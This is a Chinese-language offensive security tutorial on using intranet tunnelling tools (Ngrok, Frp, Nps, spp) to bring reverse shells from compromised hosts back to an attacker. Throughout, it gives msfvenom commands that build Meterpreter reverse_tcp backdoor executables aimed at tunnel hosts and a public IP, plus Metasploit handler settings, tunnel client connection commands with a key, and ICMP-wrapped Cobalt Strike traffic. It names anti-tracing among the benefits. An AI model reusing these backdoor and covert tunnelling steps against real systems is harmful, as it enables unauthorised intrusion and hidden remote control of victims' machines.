1.内网穿透工具

Ngrok Frp Spp Nps EW(停更) 一共是这五个

优点：穿透加密数据，中间平台，防追踪，解决网络问题

Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

https://github.com/esrrhs/spp

https://github.com/fatedier/frp

https://github.com/ehang-io/nps

2.Ngrok--内网穿透--上线

(1)服务端配置：

开通隧道-TCP协议-指向IP和端口-开通隧道-连接隧道

(2)客户端连接服务端：

./sunny clientid 133328291918 //控制端连接Ngrok的服务器

(3)客户端生成后门配置监听：

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o tcp.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 8888

run

点击下面的链接注册账户然后去登录，登录完成之后点击隧道管理，开通隧道

Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

下载客户端，因为攻击机是kali，所以下载linux的，此时查看状态是不在线，等客户端连接服务端之后就在线了

输入命令让客户端连接服务端

这里我们在生成木马的时候，监听地址应该写跳板机的，因为利用反向连接，目标主机找不到内网攻击机，下图可以看到写的后门会使当目标主机将权限给到这个跳板机的这个域名的时候，跳域名就会解析到刚才设置的攻击机的ip和端口。从而实现内网穿透。

隧道走的tcp，生成后门的时也要生成tcp的，ip和端口就写隧道的

本地kali开启msf监听，监听端口为生成隧道时的本地端口2222，然后服务器点击木马即可上线

3.Frp--内网穿透--上线

Frp是一个专注于内网穿透的高性能的反向代理应用，支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网

（1）服务端-下载-解压-修改-启动（阿里云主机记得修改安全组配置出入口）

先把frp文件放到自己的服务器上面，然后可以看到frps.ini和frpc.ini，frps.ini是服务端的配置文件，frpc.ini是客户端的配置文件

服务端的配置文件端口是默认的7000，等会在kali客户端的配置文件也应该是7000，然后两者先建立通道(不要忘记安全组把7000端口开放)

可以看到客户端也是默认的7000，上面的ip是跳板机的ip，下面的local_port是本机接受数据的ip，remote_port是跳板机用6000端口发送给kali

也就是说跳板机的安全组要开放两个端口，一个是用于连接的7000端口，一个是发送数据的6000端口，而kali的msf监听是监听本机的5555端口

启动服务端

启动客户端

来到服务端，可以看到已经成功连接

kali启动msf生成木马，ip为服务器ip，端口为6000

监听本地5555端口，接着把后门放到目标服务器，也就是飞哥的服务器，点击后门。（因为目标主机为linux的，所以这里无论生成后门还是设置监听都要弄linux的，并且还不要生成exe文件，linux无法直接执行exe文件，建议生成elf文件）

成功的上线

4.Nps--内网穿透--上线

Nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发，可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面，内网dns解析、内网socks5代理等等……，并带有功能强大的web管理端。

（1）服务端

给nps一个执行权限，然后输入命令./nps install

输入命令,运行nps           ./nps     

使用账号密码admin/123进行登录(端口号和账号密码都是可以改的，在conf目录下的nps.conf)

（2）创建客户端，生成密匙

（3）添加协议隧道，绑定指向

远程绑定5555,指向本地6666

2.客户端

(1)连接服务端

./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v

(2)生成后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5555 -f exe -o nps.exe

(3)监听后门

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 0.0.0.0

set LPORT 6666

run

创建一个客户端,不做限制

点击隧道--

协议就选择tcp，服务器端口就是跳板机的接受端口，目标端口就是转发到哪个ip的哪个端口，这里我们不写ip就是本机，因为我们使用kali作为服务端的，所以这里就是kali本机的6666端口去接受数据。也就是说目标点击后门会把流量转发到跳板机的5566端口，然后转发到kali的6666端口，我们生成后门的时候生成5566端口的后门，好让目标去找跳板机，然后监听就监听本地的6666端口即可。

来到kali客户端，先连接到这个服务端,后面那个密钥就是刚才生成客户端的时候的密钥

显示在线

msf生成后门

点击后门之后，成功上线

5.spp--特殊协议--上线

支持的协议：tcp、udp、udp、icmp、http、kcp、quic

支持的类型：正向代理、反向代理、socks5正向代理、socks5反向代

(1)服务端：监听本地的icmp数据

./spp -type server -proto ricmp -listen 0.0.0.0

(2)客户端：将本地的8082给到117这8081上（TCP封装icmp）

spp -name "test" -type proxy_client -server 47.94.236.117 -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp

(3)CS

监听器1：http 47.94.236.117 8081

监听器2：http 127.0.0.1 8082

生成后门：监听器2

这里大致过程就是利用cs监听器2生成的后门将win7的8082权限通过tcp协议移交给外网服务器的8081端口，但是因为spp项目的干扰，把tcp伪装成icmp协议发送了出去，然后服务器通过spp项目直接监听icmp的包，然后cs就会通过监听器1上线(这里cs服务端是外网的服务器)

这里我们现在服务器开启监听

在win7上面执行命令

然后cs设置两个监听器，监听器2生成后门，win7点击后门，监听器1上线。